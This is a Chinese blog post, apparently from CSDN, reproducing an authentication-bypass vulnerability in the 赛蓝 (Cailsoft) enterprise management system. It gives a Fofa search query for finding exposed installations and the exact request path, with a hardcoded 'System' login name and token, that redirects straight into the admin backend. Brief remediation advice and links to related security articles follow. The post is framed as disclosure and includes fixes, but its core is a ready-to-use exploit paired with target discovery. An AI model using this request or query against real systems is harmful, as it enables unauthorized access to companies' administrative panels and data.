首页 > 其他分享 >【漏洞复现】赛蓝企业管理系统 AuthToken 身份绕过任意登陆漏洞

【漏洞复现】赛蓝企业管理系统 AuthToken 身份绕过任意登陆漏洞

时间:2024-08-27 22:53:44浏览次数:14  
标签:AuthToken 管理 管理系统 赛蓝 漏洞 企业

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。如有侵权,请联系删除。

产品简介

赛蓝企业管理系统是一款为企业提供全面管理解决方案的软件系统,它能够帮助企业实现精细化管理,提高效率,降低成本。系统集成了多种管理功能,包括但不限于项目管理、财务管理、采购管理、销售管理以及报表分析等,旨在为企业提供一站式的管理解决方案。该系统以先进的管理思想为引导,结合企业实际业务流程,通过信息化手段提升企业管理水平。

漏洞描述

赛蓝企业管理系统 AuthToken 存在身份绕过任意登陆漏洞,未经授权的远程攻击者在发送HTTP请求后绕过登录可直接进入后台。

网络空间测绘

Fofa

body="www.cailsoft.com" || body="赛蓝企业管理系统"

image.png

漏洞复现

/AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f

302跳转直接进入后台
image.png

修复建议

1、如⾮必要,禁⽌公⽹访问该系统。
2、用防火墙等安全设备设定访问规则,只允许白名单中的设备访问。
3、及时升级产品到最新版本。

标签:AuthToken,管理,管理系统,赛蓝,漏洞,企业
From: https://blog.csdn.net/weixin_41924764/article/details/141614547

相关文章

  • weblogic漏洞环境搭建
    环境搭建使用https://github.com/QAX-A-Team/WeblogicEnvironment项目搭建weblogic环境会很简单JDK安装包下载地址:https://www.oracle.com/technetwork/java/javase/archive-139210.htmlWeblogic安装包下载地址:https://www.oracle.com/technetwork/middleware/weblogic/downloa......
  • Nuclei:开源漏洞扫描器
    Nuclei拥有灵活的模板系统,可以适应各种安全检查。它可以使用可自定义的模板向多个目标发送请求,确保零误报并实现跨多台主机的快速扫描。它支持多种协议,包括TCP、DNS、HTTP、SSL、文件、Whois、Websocket等。特征模板库:社区支持的模板集合,用于针对性地扫描各种漏洞和攻......
  • SSRF漏洞
    ssrf原理比如:A网站,是一个所有人都可以访问的外网网站,B网站是一个他们内部的OA网站。所以,我们普通用户只可以访问A网站,不能访问B网站。但是我们可以通过A网站做中间人,访问B网站,从而达到攻击B网站需求。总结SSRF漏洞就是通过篡改获取资源的请求发送给服务器,但是服务器并没有......
  • 【网络安全|白帽子】用技术合法挖漏洞,一个月能拿多少钱?
    ......
  • 经验分享|如何发现并利用信息泄露漏洞?
    信息泄露漏洞是发现和报告的重要目标。虽然它们可能不会带来很丰厚的回报,但发现它们表明Web应用程序的安全性较差,这可能有助于发现更严重的漏洞。一、常见的信息泄露漏洞类型1.1服务器标识版本服务器标识版本能够揭示服务器上运行的特定软件及其版本,这可以被用来寻找已知漏洞。......
  • 深入剖析二进制漏洞:原理、类型与利用方法
    目录引言1.1二进制漏洞简介1.2二进制漏洞的常见类型1.3二进制漏洞在CTF中的重要性缓冲区溢出2.1缓冲区溢出的基本原理2.2栈溢出攻击2.2.1EIP覆盖与ROP攻击2.2.2栈溢出的防御机制2.3堆溢出攻击2.3.1堆管理机制与漏洞利用2.3.2堆溢出的利......
  • 世邦通信SPON IP网络对讲广播系统任意文件上传漏洞
    0x00漏洞编号暂无0x01危险等级高危0x02漏洞概述世邦通信SPONIP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。0x03漏洞详情漏洞类型:任意文件上传影响:上传恶意脚本简述:世邦通信SPONIP网络对讲广播......
  • 业务逻辑漏洞
    什么是业务逻辑?       实际上,我们口口声声的业务逻辑,是只用代码实现的真实业务的规则映射。注意“规则”这个词,简单说,一个业务中,存在什么逻辑,可以通过在纸上画出不同业务对象之间的联系和约束,并将这些联系和约束一条条列出来,形成一个列表,而这列表中的每一条,就是一条......
  • Nexpose v6.6.266 for Linux & Windows - 漏洞扫描
    Nexposev6.6.266forLinux&Windows-漏洞扫描Rapid7VulnerabilityManagement,releaseAug21,2024请访问原文链接:https://sysin.org/blog/nexpose-6/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org您的本地漏洞扫描程序搜集通过实时覆盖整个网络,随......
  • 微软RDL远程代码执行超高危漏洞(CVE-2024-38077)漏洞检测排查方式
    漏洞名称:微软RDL远程代码执行超高危漏洞(CVE-2024-38077)CVSScore:  9.8漏洞描述:CVE-2024-38077是微软近期披露的一个极其严重的远程代码执行漏洞。该漏洞存在于Windows远程桌面许可管理服务(RDL)中,攻击者无需任何权限即可实现远程代码执行,获取服务器最高权限。由于在解码用......